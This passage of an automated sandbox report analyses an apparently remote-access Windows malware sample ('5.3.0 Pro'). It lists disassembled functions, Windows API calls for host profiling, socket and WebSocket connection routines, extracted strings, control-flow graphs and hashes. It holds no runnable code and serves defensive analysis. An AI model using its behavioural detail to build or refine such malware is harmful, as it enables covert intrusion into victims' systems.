                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44b1d2c152bb9255bdf401e2d89c1c425db5076c8a15731edfcb727ca5984d46
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B21A131B0031027C608767A891BA6F359A9B91719F90443EF805A72D7EE7D8A6083DF
                                                                                                                                                                                                                                                                                                                              Function 00410B19 Relevance: 7.7, APIs: 5, Instructions: 198memoryCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                                                                                                                                                                                                                                                                              • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3525466593-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: d29f1b7113f080e4870f36b8e837f1b4da9fc16b6a23fadf89bc0212f3888b6d
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 8d6069787765cd8089b920b9a1774e70d04059e2b0db351aafb66b48fc3d0dee
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d29f1b7113f080e4870f36b8e837f1b4da9fc16b6a23fadf89bc0212f3888b6d
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3161C370200301ABD720DF66C981BA77BA6BF44744F04411AF9058B786EBF8E8C5CB99
                                                                                                                                                                                                                                                                                                                              Function 00404915 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60timethreadCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetLocalTime.KERNEL32(00000001,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404946
                                                                                                                                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404994
                                                                                                                                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Create$EventLocalThreadTime
                                                                                                                                                                                                                                                                                                                              • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2532271599-1507639952
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 97709f1c623ff244ef1acfa16dc973b56bccfff956ea5f920693a17bc5923a17
                                                                                                                                                                                                                                                                                                                              • Instruction ID: b3b3bd05b27f7402d17ec3e4b95caf04d044377deb2a76ff13a13b362c137b93
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97709f1c623ff244ef1acfa16dc973b56bccfff956ea5f920693a17bc5923a17
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C2113AB19042543AC710A7BA8C09BCB7FAC9F86364F04407BF50462192D7789845CBFA
                                                                                                                                                                                                                                                                                                                              Function 0043294A Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326D2,00000024,?,?,?), ref: 0043295C
                                                                                                                                                                                                                                                                                                                              • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBCE,?), ref: 00432972
                                                                                                                                                                                                                                                                                                                              • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBCE,?), ref: 00432984
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1815803762-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 265e42ecfadf18463eab4f7c57cd3d944434f2f899047e0b797dffc1cacfdca9
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 06E06531318311BBEB310E21BC08F577AE4AF89B72F650A3AF251E40E4D2A288019A1C
                                                                                                                                                                                                                                                                                                                              Function 0041A7B2 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetComputerNameExW.KERNEL32(00000001,?,0000002B,00474358), ref: 0041A7CF
                                                                                                                                                                                                                                                                                                                              • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7E7
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Name$ComputerUser
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 4229901323-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: b63fbe807418eda0a9fc1ee5865018707abb86735c4632f840b1adfcf73bb3ed
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b63fbe807418eda0a9fc1ee5865018707abb86735c4632f840b1adfcf73bb3ed
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                                                                                                                                                                                                                                                                                              Function 0040E679 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A30,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 2f0bd58ff2c46692be8fd04023cab22914861fe3b087e1ba55e03f3e1b92ba33
                                                                                                                                                                                                                                                                                                                              • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f0bd58ff2c46692be8fd04023cab22914861fe3b087e1ba55e03f3e1b92ba33
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                                                                                                                                                                                                                                                                                              Function 00426107 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: recv
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 1507349165-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                                                                                                                                                                                                                                              • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                                                                                                                                                                                                                                                                                                              Function 10009293 Relevance: 56.4, APIs: 13, Strings: 19, Instructions: 403COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                                              control_flow_graph 494 10009293-100092bc call 10008550 498 100092c2-100092c6 494->498 499 10009356-10009373 494->499 501 100092c8-100092ca 498->501 502 100092cc 498->502 503 1000939a-100093c2 call 10003dc0 call 100085a0 call 100036c0 499->503 504 100092ce-100092ed call 10008550 501->504 502->504 520 100093c4-100093d3 503->520 521 100093d8-100093fe call 10009f90 503->521 509 100092f8-100092fc 504->509 510 100092ef-100092f6 504->510 512 10009302 509->512 513 100092fe-10009300 509->513 510->499 515 10009304-10009320 call 10008550 512->515 513->515 522 10009322-10009326 515->522 523 1000934f 515->523 524 100097b1-100097c1 call 1000dd3f call 100084c0 520->524 530 10009401-10009406 521->530 527 10009328-1000932a 522->527 528 1000932c 522->528 523->499 544 100097c4-100097cc 524->544 531 1000932e-10009346 call 10008550 527->531 528->531 530->530 533 10009408-10009421 send 530->533 542 10009375-10009379 531->542 543 10009348 531->543 536 10009423-1000944c call 10009f90 533->536 537 10009459-10009480 call 10009f90 533->537 549 10009450-10009455 536->549 550 10009483-10009488 537->550 545 1000937b 542->545 546 1000937d-1000937e 542->546 543->523 545->546 546->503 549->549 551 10009457 549->551 550->550 552 1000948a-100094bd send call 10009f90 550->552 551->552 555 100094c0-100094c5 552->555 555->555 556 100094c7-100094fc send call 10009f90 555->556 559 10009500-10009505 556->559 559->559 560 10009507-1000951e send 559->560 561 10009520-10009524 560->561 562 1000956e 560->562 563 10009526 561->563 564 10009528-1000954b call 10009f90 561->564 565 10009574-10009593 call 10009f90 562->565 563->564 571 10009550-10009555 564->571 570 10009596-1000959b 565->570 570->570 572 1000959d-100095ce send call 10009f90 570->572 571->571 573 10009557-1000956c send 571->573 576 100095d0-100095d5 572->576 573->565 576->576 577 100095d7-10009605 send call 10009f90 576->577 580 10009608-1000960d 577->580 580->580 581 1000960f-1000961e send 580->581 582 10009620-10009623 581->582 583 10009641-10009657 recv 582->583 584 10009625-1000962b 582->584 583->544 587 1000965d-1000965e 583->587 585 10009660-1000966e 584->585 586 1000962d-10009635 584->586 588 10009670-10009674 585->588 589 10009683-1000969e call 10008550 585->589 586->585 590 10009637-1000963f 586->590 587->582 591 10009676 588->591 592 10009678-10009679 588->592 595 100096a4-100096a8 589->595 596 1000979c-100097a0 589->596 590->583 590->585 591->592 592->589 595->596 599 100096ae 595->599 597 100097a2 596->597 598 100097a4-100097ac 596->598 597->598 598->524 600 100096b4 599->600 601 100096b6-100096b9 600->601 602 100096d7-100096e9 recv 601->602 603 100096bb-100096c1 601->603 602->544 604 100096ef-100096f0 602->604 605 100096f2-100096f9 603->605 606 100096c3-100096cb 603->606 604->601 605->600 607 100096fb-10009702 605->607 606->605 608 100096cd-100096d5 606->608 607->600 609 10009704-10009735 setsockopt ioctlsocket call 1000a5f3 607->609 608->602 608->605 611 1000973a-1000979b 609->611
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: Connection: Upgrade$ERROR: Could not parse WebSocket url: %s$ERROR: Got bad status connecting to %s: %s$ERROR: Got invalid status line connecting to: %s$GET /%s HTTP/1.1$HTTP/1.1 %d$Host: %s$Host: %s:%d$Origin: %s$P$Sec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==$Sec-WebSocket-Version: 13$Unable to connect to %s:%d$Upgrade: websocket$e$ws://%[^:/]$ws://%[^:/]/%s$ws://%[^:/]:%d$ws://%[^:/]:%d/%s
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-1585909395
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 12572963b92fc2fbb6932ee6605c50527e2d8c00a7f48e67dae44c0a149c157e
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 8c5c428c0198e8a7c9dce20c2a40cf958e763ea39fc21358b4929ecef954cfc7
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12572963b92fc2fbb6932ee6605c50527e2d8c00a7f48e67dae44c0a149c157e
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1FE1F1B5900214AEFB14CF64DC85FEEB7B8EB05394F848195F609A7086D372AB49CF64
                                                                                                                                                                                                                                                                                                                              Function 00413FD4 Relevance: 53.3, APIs: 5, Strings: 25, Instructions: 813sleepnetworkCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                                              control_flow_graph 612 413fd4-41401f call 401faa call 41aa83 call 401faa call 401d64 call 401e8f call 43a5f7 625 414021-414028 Sleep 612->625 626 41402e-41407c call 401f66 call 401d64 call 401fbd call 41afd3 call 404262 call 401d64 call 40b125 612->626 625->626 641 4140f0-41418a call 401f66 call 401d64 call 401fbd call 41afd3 call 401d64 * 2 call 4085b4 call 4027cb call 401eef call 401eea * 2 call 401d64 call 405422 626->641 642 41407e-4140ed call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 404101 626->642 695 41419a-4141a1 641->695 696 41418c-414198 641->696 642->641 697 4141a6-414242 call 40541d call 404cbf call 405ce6 call 4027cb call 401f66 call 41a696 call 401eea * 2 call 401d64 call 401e8f call 401d64 call 401e8f call 413f9a 695->697 696->697 724 414244-41428a WSAGetLastError call 41bc86 call 404c9e call 401f66 call 41a696 call 401eea 697->724 725 41428f-41429d call 4041f1 697->725 748 414b54-414b66 call 4047eb call 4020b4 724->748 731 4142ca-4142df call 404915 call 40428c 725->731 732 41429f-4142c5 call 401f66 * 2 call 41a696 725->732 747 4142e5-414432 call 401d64 * 2 call 404cbf call 405ce6 call 4027cb call 405ce6 call 4027cb call 401f66 call 41a696 call 401eea * 4 call 41a97d call 413683 call 4082dc call 440c61 call 401d64 call 401fbd call 4022f8 call 401e8f * 2 call 41265d 731->747 731->748 732->748 812 414434-414441 call 40541d 747->812 813 414446-41446d call 401e8f call 412513 747->813 760 414b68-414b88 call 401d64 call 401e8f call 43a5f7 Sleep 748->760 761 414b8e-414b96 call 401d8c 748->761 760->761 761->641 812->813 819 414474-414abb call 403b40 call 40cbf1 call 41adfe call 41aed8 call 41ad56 call 401d64 GetTickCount call 41ad56 call 41acb0 call 41ad56 * 2 call 41ac62 call 41aed8 * 5 call 40e679 call 41aed8 call 4027ec call 40275c call 4027cb call 40275c call 4027cb * 3 call 40275c call 4027cb call 405ce6 call 4027cb call 405ce6 call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 405ce6 call 4027cb * 5 call 40275c call 4027cb call 40275c call 4027cb * 7 call 40275c call 404468 call 401eea * 50 call 401e13 call 401eea * 6 call 401e13 call 4045d5 813->819 820 41446f-414471 813->820 1065 414ac0-414ac7 819->1065 820->819 1066 414ac9-414ad0 1065->1066 1067 414adb-414ae2 1065->1067 1066->1067 1068 414ad2-414ad4 1066->1068 1069 414ae4-414ae9 call 40a767 1067->1069 1070 414aee-414b20 call 405415 call 401f66 * 2 call 41a696 1067->1070 1068->1067 1069->1070 1081 414b22-414b2e CreateThread 1070->1081 1082 414b34-414b4f call 401eea * 2 call 401e13 1070->1082 1081->1082 1082->748
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                                                                                                                                                                                                                                                                                                                              • WSAGetLastError.WS2_32 ref: 00414249
                                                                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,00000002), ref: 00414B88
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Sleep$ErrorLastLocalTime
                                                                                                                                                                                                                                                                                                                              • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$TLS Off$TLS On $TUF$XCG$XCG$XCG$`=G$dCG$fyhstga-ONSWMZ$hlight$name$>G$>G$BG
                                                                                                                                                                                                                                                                                                                              • API String ID: 524882891-758395017
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 535ab475a5e7f065e9ffb8840f1f7c82a23e43134cf4f3e82dceb6296a1bb615
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 1c0fcd5d2769b0c1ed3f5537d8c306574ebe830810c6f13c8178cbf41d879861
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 535ab475a5e7f065e9ffb8840f1f7c82a23e43134cf4f3e82dceb6296a1bb615
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B525E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D
                                                                                                                                                                                                                                                                                                                              Function 10007240 Relevance: 42.1, APIs: 12, Strings: 12, Instructions: 59libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,10006E4E), ref: 10007252
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 1000725B
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,10006E4E), ref: 1000726C
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 1000726F
                                                                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,10006E4E), ref: 10007286
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 10007289
